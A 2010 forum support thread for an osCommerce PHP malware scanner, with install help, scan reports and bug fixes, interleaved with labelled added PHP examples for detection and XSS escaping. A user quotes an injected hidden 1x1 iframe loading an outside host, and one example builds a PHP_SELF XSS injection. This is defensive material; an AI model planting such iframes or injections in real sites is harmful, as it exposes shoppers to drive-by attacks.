Guest Posted March 24, 2010

osCommerce VTS - Virus & Threat Scanner

Support thread (Please be kind to me since English is not my first language)

Welcome to osCommerce VTS.

In the ever-decreasing world of Internet security, web servers are fast becoming a target for spammers and authors of malicious code to spread their nasties. Server security is paramount, and the spread of malicious code can be prevented by competent administrators and knowledgeable web masters. But why not be on the safe side?

osCommerce VTS is designed to run on your web server and scan your public web files for malicious code. It is small, portable and efficient, uses minimal server resources, and provides a full report on what has been discovered.

This software is provided as-is, without warranty or guarantee of any kind. Use at your own risk.

osCommerce VTS runs on Linux web servers (it has been known to function under Windows), and is optimised to run on shared web hosting accounts. Although osCommerce VTS may function with older versions, it remains untested and unsupported. Therefore I recommend you have the following installed on your server:

* Apache 1.3 or higher
* PHP 4.3.x or higher

What osCommerce VTS does:

* Scan for known *.php hacker files
* Scan for known hacker sites & IP's
* Scan for known suspicious code
* Scan all types of files on your site (Not only php files)
* Scan for open tag inside GIF image
* Scan for possible shell execution
* Scan for suspicious COOKIE references

...and more to come..

The contribution can be found at: osCommerce VTS

bethbud Posted March 31, 2010

Forgive my limited experience... Just need a little clarification of instructions.

* Edit config.php to your needs......What would my needs be? Is some modification needed?
* CHMOD all files 755 or lower.......What does CHMOD mean?
* - add above:

<!--osCommerce Virus & Threat Scan -->
<?php echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan'; ?>
<!--osCommerce Virus & Threat Scan -->

................Add this above the first </td> ?

Thanks,
~*Beth

bethbud Posted March 31, 2010

Having trouble pinpointing it. This is my header.php. So where do I add the code? Thanks so much. Appreciate it!

<?php
/*
$Id: header.php 3 2006-05-27 04:59:07Z user $

  osCMax Power E-Commerce
  http://oscdox.com

  Copyright 2006 osCMax2005 osCMax, 2002 osCommerce

  Released under the GNU General Public License
*/

  if ($messageStack->size > 0) {
    echo $messageStack->output();
  }
?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
    <td><?php echo '<a href="http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td>
    <td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a> <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a> <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?> </td>
  </tr>
  <tr class="headerBar">
<?php /* BOF: MOD - Admin Security */ ?>
<?php /* old- <td class="headerBarContent"> <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?>
<?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td> */ ?>
    <td class="headerBarContent"> <?php
      if (tep_session_is_registered('login_id')) {
        echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>';
      } else {
        echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>';
      }
    ?></td>
    <td class="headerBarContent" align="right"><?php echo ' <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a> | <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td>
<?php /* EOF: MOD - Admin Security */ ?>
  </tr>
</table>

Guest Posted March 31, 2010

> Forgive my limited experience... Just need a little clarification of instructions.
>
> * Edit config.php to your needs......What would my needs be? Is some modification needed?

e.g. You can configure where you want the program to start scanning:

$CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT'];

or

$CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT']."/catalog";

> * CHMOD all files 755 or lower.......What does CHMOD mean?

You have to set file permission to 755 or lower

> * - add above:
>
> <!--osCommerce Virus & Threat Scan -->
> <?php echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan'; ?>
> <!--osCommerce Virus & Threat Scan -->
>
> ................Add this above the first </td> ?

See my reply on your next message..

Guest Posted March 31, 2010

> Having trouble pinpointing it. This is my header.php. So where do I add the code? Thanks so much. Appreciate it!

Here is your updated header.php file. I have inserted the code for osCommerce VTS in it:

<?php
/*
$Id: header.php 3 2006-05-27 04:59:07Z user $

  osCMax Power E-Commerce
  http://oscdox.com

  Copyright 2006 osCMax2005 osCMax, 2002 osCommerce

  Released under the GNU General Public License
*/

  if ($messageStack->size > 0) {
    echo $messageStack->output();
  }
?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
    <td><?php echo '<a href="http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td>
    <td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a> <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a> <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?> </td>
  </tr>
  <tr class="headerBar">
<?php /* BOF: MOD - Admin Security */ ?>
<?php /* old- <td class="headerBarContent"> <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?>
<?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td> */ ?>
    <td class="headerBarContent"> <?php
      if (tep_session_is_registered('login_id')) {
        echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>';
      } else {
        echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>';
      }
    ?>
<!--osCommerce Virus & Threat Scan -->
<?php echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan' . '</a>'; ?>
<!--osCommerce Virus & Threat Scan -->
    </td>
    <td class="headerBarContent" align="right"><?php echo ' <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a> | <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td>
<?php /* EOF: MOD - Admin Security */ ?>
  </tr>
</table>

Hope this helps. Remember to BACKUP before you do any changes on your site!

danut82 Posted April 1, 2010 (edited)

Salve, is one of these messages a problem?

public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution)
public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found)
public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( )
public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe)
public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( )
public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( )
public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) )

Thanks

Edited April 1, 2010 by danut82

Guest Posted April 2, 2010

> Salve, is one of these messages a problem?
>
> public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution)

I have the same report for this file, no problem. But to be sure, compare it with the original one.

> public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found)
> public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( )
> public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe)
> public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( )
> public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( )
> public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) )

These files I don't know since it is a contribution I don't use. You should compare these files with the original ones to see if there are any changes that should not be in them.

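Added example, not part of the thread and not osCommerce VTS code: one way to do the "compare with the original ones" step is to hash every file in the live install and in a freshly unpacked copy of the same release, then list what differs. The function names, the temp-directory layout and the file contents are constructed for the demonstration; PHP 7.1 or later is assumed.

```php
<?php
// Added example (not osCommerce VTS code). Requires PHP 7.1+.

/** Map of relative path => SHA-256 for every regular file under $root. */
function hashTree(string $root): array
{
    $root = rtrim($root, '/\\');
    $hashes = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if ($file->isFile()) {
            $relative = substr($file->getPathname(), strlen($root) + 1);
            $hashes[str_replace('\\', '/', $relative)] = hash_file('sha256', $file->getPathname());
        }
    }
    return $hashes;
}

/** Classify every path as modified, added (live only) or missing (clean only). */
function compareTrees(string $liveRoot, string $cleanRoot): array
{
    $live   = hashTree($liveRoot);
    $clean  = hashTree($cleanRoot);
    $report = ['modified' => [], 'added' => [], 'missing' => []];
    foreach ($live as $path => $hash) {
        if (!isset($clean[$path])) {
            $report['added'][] = $path;      // the release never shipped this file
        } elseif ($clean[$path] !== $hash) {
            $report['modified'][] = $path;   // content differs from the original
        }
    }
    $report['missing'] = array_keys(array_diff_key($clean, $live));
    foreach ($report as &$list) {
        sort($list);
    }
    unset($list);
    return $report;
}

// Constructed demo data: two small trees in the temp directory.
$base = sys_get_temp_dir() . '/vts_compare_' . uniqid();
foreach (['clean', 'live'] as $tree) {
    mkdir("$base/$tree/includes", 0700, true);
    file_put_contents("$base/$tree/includes/general.php", "<?php\nfunction demo() { return 1; }\n");
    file_put_contents("$base/$tree/footer.php", "<?php echo 'footer';\n");
}
// Constructed changes standing in for what a compromise leaves behind.
file_put_contents("$base/live/footer.php", "<?php echo 'footer'; echo 'line not in the original';\n");
file_put_contents("$base/live/includes/x.php", "<?php echo 'file the release never shipped';\n");

print_r(compareTrees("$base/live", "$base/clean"));
```

Files you edited on purpose, such as templates and configuration, will also show up as modified, so the list is a starting point for review rather than a verdict.
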
smic717394 Posted April 23, 2010

Somebody injected one of our JavaScripts with the code below, and it has not been detected.

var jquery = '<iframe height=1 width=1 border=0 src="http:// melopp.biz/fol/?606717496665bcba"> </iframe>';

Guest Posted April 23, 2010

> Somebody injected one of our JavaScripts with the code below, and it has not been detected.
>
> var jquery = '<iframe height=1 width=1 border=0 src="http:// melopp.biz/fol/?606717496665bcba"> </iframe>';

oooops

A small check is missing in the code, which causes the scanner to NOT scan files with a 2, 4 or 5 letter extension. I have fixed this and will UL a new version today.

Thanks for pointing this out for me!

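Added example, not part of the thread and not osCommerce VTS code: the scanner's source is not shown here, so `isScannedThreeLetterOnly()` is a hypothetical filter with the kind of defect described, used only to show which files such a filter skips. `findHiddenIframes()` is a content check that runs on every file regardless of extension; the sample files and the `example.invalid` host are constructed.

```php
<?php
// Added example (not osCommerce VTS code). Requires PHP 7.1+.

// Hypothetical filter with the kind of defect described above:
// only names ending in a dot plus exactly three characters are scanned.
function isScannedThreeLetterOnly(string $path): bool
{
    return preg_match('/\.[A-Za-z0-9]{3}$/', $path) === 1;
}

// Return every iframe tag that is sized 1x1 or smaller, or hidden with inline CSS.
function findHiddenIframes(string $content): array
{
    $hits = [];
    preg_match_all('/<iframe\b[^>]*>/i', $content, $tags, PREG_OFFSET_CAPTURE);
    foreach ($tags[0] as [$tag, $offset]) {
        $tiny = 0;
        foreach (['height', 'width'] as $attr) {
            if (preg_match('/\b' . $attr . '\s*=\s*["\']?\s*(\d+)/i', $tag, $m) && (int) $m[1] <= 1) {
                $tiny++;
            }
        }
        $cssHidden = preg_match('/display\s*:\s*none|visibility\s*:\s*hidden/i', $tag) === 1;
        if ($tiny === 2 || $cssHidden) {
            $line = substr_count(substr($content, 0, $offset), "\n") + 1;
            $hits[] = ['line' => $line, 'tag' => $tag];
        }
    }
    return $hits;
}

// Scan every file regardless of extension and note what the filter would have skipped.
function scanFiles(array $files): array
{
    $report = [];
    foreach ($files as $path => $content) {
        foreach (findHiddenIframes($content) as $hit) {
            $report[] = $hit + [
                'file'           => $path,
                'missedByFilter' => !isScannedThreeLetterOnly($path),
            ];
        }
    }
    return $report;
}

// Constructed samples (path => content); example.invalid is a placeholder host.
$files = [
    'includes/menu.js'   => "var a = 1;\nvar jquery = '<iframe height=1 width=1 border=0 "
                          . "src=\"http://example.invalid/x\"></iframe>';\n",
    'index.html'         => "<p>shop</p>\n<iframe style=\"display:none\" "
                          . "src=\"http://example.invalid/y\"></iframe>\n",
    'product_info.php'   => "<?php echo 'clean';\n",
    'includes/video.php' => "<iframe width=\"560\" height=\"315\" src=\"/player\"></iframe>\n",
];
print_r(scanFiles($files));
```

Both flagged samples sit in files with 2 and 4 letter extensions, which is why a content check should not be gated on the length of the file extension.
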
Guest Posted April 23, 2010

A new version is uploaded now: osCommerce VTS 1.0.4

If you are using this scanner, PLEASE update to this version because of a critical error in older versions!

Guest Posted May 4, 2010

A new version is now made available: osCommerce VTS 1.0.5

What's new:

* Added check for leading & trailing whitespace in .php files

I added this check because of all the problems people out there have with leading and trailing whitespace. As Spook said: "very common issue after editing with the likes of filemanager, to add confusion, spaces at the end do not always cause issues at first, but issues can randomly occur later, maybe just through re-uploading the same file!! "

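Added example, not part of the thread and not osCommerce VTS code: a leading and trailing whitespace check built on PHP's tokenizer. Any bytes outside the PHP tags are sent as output, so a stray blank line or an editor-written byte order mark makes later header, cookie and session calls fail with "headers already sent". The function names and the sample sources are constructed; the tokenizer extension is assumed to be enabled.

```php
<?php
// Added example (not osCommerce VTS code). Requires the tokenizer extension.

const UTF8_BOM = "\xEF\xBB\xBF";

// Text of one token as returned by token_get_all().
function tokenText($token): string
{
    return is_array($token) ? $token[1] : $token;
}

// True when the token is literal output made only of whitespace and/or a BOM.
function isBlankOutput($token): bool
{
    return is_array($token)
        && $token[0] === T_INLINE_HTML
        && trim(str_replace(UTF8_BOM, '', $token[1])) === '';
}

// Report blank output before the first opening tag and after the last closing tag.
function checkPhpWhitespace(string $source): array
{
    $tokens = token_get_all($source);
    $issues = [];
    if ($tokens && isBlankOutput($tokens[0])) {
        $issues[] = strpos($tokens[0][1], UTF8_BOM) === 0 ? 'leading BOM' : 'leading whitespace';
    }
    if (count($tokens) > 1 && isBlankOutput(end($tokens))) {
        $issues[] = 'trailing whitespace';
    }
    return $issues;
}

// Remove exactly the blank output that checkPhpWhitespace() reports.
function stripPhpWhitespace(string $source): string
{
    $tokens = token_get_all($source);
    if ($tokens && isBlankOutput($tokens[0])) {
        array_shift($tokens);
    }
    if ($tokens && isBlankOutput(end($tokens))) {
        array_pop($tokens);
    }
    return implode('', array_map('tokenText', $tokens));
}

// Constructed samples (label => file content).
$samples = [
    'closing tag plus one newline' => "<?php echo 'x'; ?>\n",
    'blank line before opening tag' => "\n<?php echo 'x';\n",
    'BOM written by an editor'      => UTF8_BOM . "<?php echo 'x';\n",
    'spaces after closing tag'      => "<?php echo 'x'; ?>\n  \n",
    'no closing tag, blank lines'   => "<?php echo 'x';\n\n\n",
];
foreach ($samples as $label => $source) {
    $before = implode(', ', checkPhpWhitespace($source)) ?: 'ok';
    $after  = implode(', ', checkPhpWhitespace(stripPhpWhitespace($source))) ?: 'ok';
    printf("%-32s %-22s after fix: %s\n", $label, $before, $after);
}
```

The first and last samples come back clean: PHP swallows a single newline directly after the closing tag, and blank lines in a file with no closing tag are still inside PHP code, so neither produces output.
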
Guest Posted May 6, 2010

Thanks for this contribution, I'll install it soon. Just a quick question with regards to your newest scan for whitespace in php files, is it possible for you to include the option to delete these trailing whitespaces? I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL).

Thanks.

Guest Posted May 6, 2010

> Thanks for this contribution, I'll install it soon. Just a quick question with regards to your newest scan for whitespace in php files, is it possible for you to include the option to delete these trailing whitespaces? I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL).

I have implemented that for the next version, but I need to do some more testing of it..

Guest Posted May 6, 2010

Great, looking forward to it. I have another question/suggestion (you can read more about it here) http://www.oscommerce.com/forums/topic/358244-php-self/ with regards to PHP_SELF in code, which can cause problems. For interest's sake I searched for this term in my osCommerce files and it appears several hundred times. What are your comments on this? (I'm not a coder hence the question).

Guest Posted May 6, 2010

> Great, looking forward to it. I have another question/suggestion (you can read more about it here) http://forums.oscomm...58244-php-self/ with regards to PHP_SELF in code, which can cause problems. For interest's sake I searched for this term in my osCommerce files and it appears several hundred times. What are your comments on this? (I'm not a coder hence the question).

I haven't studied php_self much, but yes, it can cause problems like Cross Site Scripting (XSS). And yes, php_self is used a lot in osCommerce.

I am not an expert on this, but what is said about this is: "Every PHP_SELF should be converted to HTML entities, with a function like htmlentities"

There are contributions for osCommerce that prevent XSS.

If you have not already done it, then read How to secure your site

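Added example, not part of the thread and not osCommerce code: the PHP_SELF problem discussed above, with the unescaped output beside the htmlentities fix quoted in the reply and a SCRIPT_NAME alternative. The `$server` array stands in for `$_SERVER`, and the function names and the request are constructed, with harmless bold markup as the injected text.

```php
<?php
// Added example (not osCommerce code). $server stands in for $_SERVER.

// Vulnerable: PHP_SELF includes any extra path the client appended after the script name.
function formTagUnsafe(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

// The fix quoted in the thread: convert PHP_SELF to HTML entities before output.
function formTagEscaped(array $server): string
{
    return '<form action="' . htmlentities($server['PHP_SELF'], ENT_QUOTES, 'UTF-8') . '" method="post">';
}

// Alternative: SCRIPT_NAME carries no client-supplied path info; still escape on output.
function formTagScriptName(array $server): string
{
    return '<form action="' . htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8') . '" method="post">';
}

// What a browser takes as the action attribute: everything up to the first raw quote.
function actionAttribute(string $tag): string
{
    preg_match('/action="([^"]*)"/', $tag, $m);
    return html_entity_decode($m[1] ?? '', ENT_QUOTES, 'UTF-8');
}

// Constructed request: /catalog/login.php/%22%3E%3Cb%3Einjected%3C/b%3E
// The web server decodes the extra path and PHP appends it to PHP_SELF.
$server = [
    'SCRIPT_NAME' => '/catalog/login.php',
    'PHP_SELF'    => '/catalog/login.php/"><b>injected</b>',
];

foreach (['formTagUnsafe', 'formTagEscaped', 'formTagScriptName'] as $build) {
    $tag = $build($server);
    printf("%s\n  html:   %s\n  action: %s\n\n", $build, $tag, actionAttribute($tag));
}
```

In the unsafe output the attribute ends at the injected quote and the rest of the path becomes markup on the page; in the escaped output the whole path stays inside the attribute value.
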
Guest Posted May 6, 2010

Yes I've already got the contrib for anti-XSS. I was just wondering about it, and this solution was recommended: http://www.oscommerce.com/forums/topic/348589-serious-hole-found-in-oscommerce/page__view__findpost__p__1467014

Guest Posted May 19, 2010

A new version has been uploaded.

What's new:

* Added new file for handling whitespace configuration (whitespace.php)
* Added choice for removing leading and trailing whitespace

REMEMBER BACKUP!!
================

hetmana Posted September 8, 2010 (edited)

======== On ocVTS.php ========

ABOVE the results, I get THOUSANDS of the following error:

Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that.

======== On ocVTSa.php ========

No notices/errors other than the actual results, just 19 counts of (shell execution) that I need to inspect against original files.

-------------------------

Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5"

Edited September 8, 2010 by hetmana

Guest Posted September 10, 2010

> ======== On ocVTS.php ========
>
> ABOVE the results, I get THOUSANDS of the following error:
>
> Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

Fixed in next release.. sorry..

> I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

This I don't know, could you post here the listing from ocVTS please?

> BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that.

It is looking for any case of an admin dir. If you have other utils installed that have an admin dir, then ocVTS will report that..

> Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5"

This was a little miss. It is fixed now..

hetmana Posted September 11, 2010

> > Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143
> >
> > I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?
>
> This I don't know, could you post here the listing from ocVTS please?

Line 143 is the line that is specifically looking for file_manager.php. I assume that's what you mention fixing in the next release (?)

Thanks for jumping on this so quickly -- MUCH appreciated!! B)

Guest Posted September 11, 2010

> Line 143 is the line that is specifically looking for file_manager.php. I assume that's what you mention fixing in the next release (?)

flagThreat is a variable that flags all threats, not specific to file_manager.php.

Just to be sure, did you get this line listed:

You should delete file_manager.php from your admin folder !

Guest Posted September 14, 2010

A new version released today.

What's new:

* Implemented a grep function where you can search your site for your own keywords
* Fixed an undefined variable bug
* Fixed ocVTS to check for only osCommerce's renamed admin dir

Have fun!

pac_indahood Posted September 15, 2010

I can't connect

Warning: ftp_login() [function.ftp-login]: Login incorrect in /public_html/catalog/admin/AV/ocVTS.php on line 233

Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234

Where is the issue? Thanks

Guest Posted September 15, 2010

> I can't connect
>
> Warning: ftp_login() [function.ftp-login]: Login incorrect in /public_html/catalog/admin/AV/ocVTS.php on line 233
>
> Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234
>
> Where is the issue? Thanks

Did you fill in these in whitespace.php:

$ftp_site = 'yoursite.com'; // your ftp site
$ftp_usr = 'username'; // your ftp username
$ftp_pwd = 'password'; // your ftp password
$ftp_root = 'public_html'; // your ftp site root folder

pac_indahood Posted September 17, 2010

Thank you, I didn't see it. Now I have another problem:

Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234